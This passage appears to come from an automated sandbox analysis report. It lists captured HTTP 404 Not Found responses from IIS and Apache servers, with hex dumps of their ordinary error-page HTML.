6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:35 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:38 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:26:44 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:26:47 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:26:50 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:26:52 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 03 Dec 2023 15:26:58 GMTConnection: closeContent-Length: 4857Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 